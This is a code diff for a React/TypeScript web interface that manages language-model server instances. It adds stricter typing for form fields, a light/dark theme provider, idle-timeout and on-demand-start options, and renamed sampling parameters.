const fieldType = getFieldType(fieldKey)
const handleChange = (newValue: any) => {
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey, newValue)
}
@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={value || false}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input
id={fieldKey}
type="number"
value={value || ''}
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
handleChange(numValue)
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input
id={fieldKey}
type="text"
value={value || ''}
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}

View File

@@ -1,5 +1,4 @@
import type { CreateInstanceOptions} from '@/schemas/instanceOptions';
import { getAllFieldKeys } from '@/schemas/instanceOptions'
import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default
export const basicFieldsConfig: Record<string, {
@@ -22,6 +21,15 @@ export const basicFieldsConfig: Record<string, {
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',

View File

@@ -6,6 +6,8 @@ export const CreateInstanceOptionsSchema = z.object({
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Common params
verbose_prompt: z.boolean().optional(),
@@ -14,12 +16,12 @@ export const CreateInstanceOptionsSchema = z.object({
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
priority: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
priority_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
@@ -82,7 +84,7 @@ export const CreateInstanceOptionsSchema = z.object({
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temperature: z.number().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
@@ -109,7 +111,7 @@ export const CreateInstanceOptionsSchema = z.object({
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Server/Example-specific params
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
@@ -149,8 +151,6 @@ export const CreateInstanceOptionsSchema = z.object({
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
// Speculative decoding params
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),

13
webui/src/vite-env.d.ts vendored Normal file
View File

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />
declare global {
interface ImportMetaEnv {
readonly VITE_APP_VERSION?: string
}
interface ImportMeta {
readonly env: ImportMetaEnv
}
}
export {}

View File

@@ -18,8 +18,9 @@
"baseUrl": ".",
"paths": {
"@/*": ["./src/*"]
}
},
"types": ["vite/client"]
},
"include": ["src"],
"include": ["src", "src/vite-env.d.ts"],
"references": [{ "path": "./tsconfig.node.json" }]
}